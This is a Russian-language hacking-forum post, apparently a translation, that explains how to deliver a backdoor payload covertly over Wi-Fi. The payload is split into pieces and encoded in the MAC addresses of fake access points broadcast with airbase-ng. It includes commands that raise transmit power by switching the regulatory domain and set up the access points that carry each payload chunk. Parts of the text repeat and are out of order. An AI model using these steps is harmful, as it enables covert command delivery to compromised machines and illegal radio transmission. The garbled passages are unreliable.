Привет любимый codeby, с вами Ghost Pants и сегодня мы поговорим о загрузке пейлоада через wi-fi. Данная статья является переводом с внесением корректив вот этой статьи
Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме атакующий проводит атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом.
На заметку: вы можете использовать MANA-Toolkit или что-нибудь подобное https://github.com/sensepost/mana
Приступаем, допустим у нас есть пейлоад “
с помощью этих команд мы увеличиваем мощность нашей AP
Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера.
Дальше пойдут команды с кратким описанием:
Ссылка скрыта от гостей
.Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме атакующий проводит атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом.
На заметку: вы можете использовать MANA-Toolkit или что-нибудь подобное https://github.com/sensepost/mana
Приступаем, допустим у нас есть пейлоад “
fec8b00011ddc00945f1
”- Шаг 1 *звук гонга*: нам нужно сделать фейковую точку доступа с которую мы назовём "Фейк" (да да, мы будем максимально оригинальны) и мак адрес у неё будет
00:fe:c8:b0:00:11
- Мак адрес
00:fe:c8:b0:00:11
это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1
”-Это секция пейлоада “fec8b00011ddc00945f1”
- Шаг 2 *ту ту*: система с беком сканит ESSID нашего фейка и дампит BSSID для неё
-Наш код должен сделать так:
fe:c8:b0:00:11 ==> fec8b00011
- Шаг 3 *кря*: атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком
00:dd:c0:09:45:f1
-Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “
ddc00945f1
”-Это секция пейлоада “fec8b00011ddc00945f1”
- Шаг 4 *вы что-нибудь слышите?*:система с бекдором должна дампить данную секцию BSSID или мак
dd:c0:09:45:f1 ==> [B]ddc00945f1[/B]
Код:
ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 txpower 30
Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера.
Дальше пойдут команды с кратким описанием:
airmon-ng start wlan0
- запускаем интерфейсairbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon
- делаем первый кусок пейлоадаsleep 15
- дайте точке поспать 15 секундkillall airbase-ng
- если у точки бессонницаairbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon
- второй кусок пейлоадаsleep 15
- дайте точке поспать 15 секундkillall airbase-ng
- если у точки бессонница
Последнее редактирование: